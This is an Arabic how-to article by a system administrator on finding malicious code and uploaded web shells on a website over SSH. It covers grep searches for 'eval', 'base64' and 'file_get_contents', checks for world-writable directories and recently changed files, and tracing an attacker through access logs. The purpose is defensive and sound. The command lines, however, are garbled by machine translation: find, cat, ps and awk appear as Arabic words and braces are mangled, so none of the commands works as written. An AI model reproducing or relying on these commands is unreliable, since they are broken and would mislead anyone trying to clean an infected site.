لقد كتب الكثير عن البحث عن التعليمات البرمجية الضارة. برامج مكافحة الفيروسات، تم إنشاء العديد من الخدمات التي يمكنها الإشارة إلى عنوان الصفحة المصابة، وحتى توفير التوقيع و معلومات شاملةعن الفيروس نفسه. ولكن لا يوجد برنامج يمكنه إخبارك بكيفية ظهور هذا "الرمز الفضائي" على الموقع. هنا يجب أن تعتمد على نفسك فقط.

سأقدم أدناه العديد من الأوامر التي يمكن استخدامها عند البحث عن الملفات المصابة و/أو الأصداف/الأبواب الخلفية التي تم تحميلها إلى موقع الويب الخاص بك. للقيام بذلك، نحتاج إلى برنامج PuTTY ووصول SSH إلى الموقع.

البحث عن الملفات المصابة

باستخدام الأوامر التالية، يمكنك العثور على الملفات التي تحتوي على عناصر "خطيرة" يمكن للمهاجم استخدامها لتنفيذ تعليمات برمجية مشوشة ضارة.

ستتم كتابة مخرجات الملفات إلى ملف سجل في الدليل الحالي الخاص بك. سيحتوي كل ملف على المسار إلى الملف الذي تم العثور عليه وسطرًا يحتوي على قسم مشبوه من التعليمات البرمجية.

ابحث عن / الدليل باستخدام الموقع -type f -iname "*" -exec grep -Him1 "eval" () \; > ./eval.log
ابحث عن / الدليل باستخدام الموقع -type f -iname "*" -exec grep -Him1 "base64" () \; > ./base64.log
ابحث عن / الدليل باستخدام الموقع -type f -iname "*" -exec grep -Him1 "file_get_contents" () \; > ./file_get_contents.log

العثور على الدلائل مع أذونات الكتابة الكاملة

يعرض الأمر التالي قائمة بالأدلة حيث حقوق كاملةللتسجيل. هذه هي الدلائل التي يتم استخدامها لإصابة موقع على شبكة الإنترنت.

ابحث عن ./الدليل مع موقع الويب -perm 777 -type d

البحث عن الملفات التي تم تغييرها خلال فترة ما

إذا كنت تعرف تاريخ حدوث الإصابة تقريبًا، فيمكنك عرض قائمة بالملفات التي تم تغييرها خلال الأيام القليلة الماضية (تشير المعلمة –mtime -7 إلى تاريخ تغيير غير التاريخ الحالي للأيام السبعة الماضية)

ابحث عن ./الدليل باستخدام موقع الويب -type f -iname "*" -mtime -7

ماذا تفعل إذا أصيب الموقع؟

لذا، لنفترض أننا عثرنا على ملفات مصابة أو ملف shell. قبل أن تقوم بإزالته/إزالة التعليمات البرمجية الضارة منه، تذكر اسمه ( مسار كامل) ، تاريخ تعديل/إنشاء الملف، معرف المستخدم الخاص به ومعرف المستخدم (for أنظمة يونكس)، سيسمح لك هذا بإيجاد طريقة لتحميله على موقعنا. لنبدأ مع المستخدم والمجموعة:

تعرف على المستخدم الذي يعمل عليه خادم الويب الخاص بك:

ملاحظة -aux | grep "Apache2" | أوك("طباعة $1")

إذا كان هذا المستخدم هو نفس المستخدم الذي قام بإنشائه ملف ضار، فيمكننا أن نفترض أنه تم تنزيله من خلال الموقع نفسه. إذا لم يكن الأمر كذلك، فمن الممكن أن يكون الملف قد تم تنزيله عبر بروتوكول نقل الملفات (نوصي بشدة بتغيير كلمات المرور لخادم FTP واللوحة الإدارية للموقع).

القط ./site.ru.access.log | grep "اسم الملفاسمOfShellScript"

ونحصل على مخرجات جميع الطلبات إلى البرنامج النصي الخاص بنا. باستخدامه نحدد userAgent وعنوان IP الخاص بالمهاجم.

مع الأمر التالي، نحصل على قائمة بجميع الطلبات التي جاء إلينا.

القط ./site.ru.access.log | grep "ip" | grep "وكيل المستخدم"

من خلال تحليلها بعناية، يمكنك العثور على نقطة ضعف على الموقع، ويجب عليك الدفع انتباه خاصلطلبات POST من المخرجات، والتي كان من الممكن استخدامها لتحميل ملف ضار.

أندريه إيزاكوفسكي، مسؤول النظام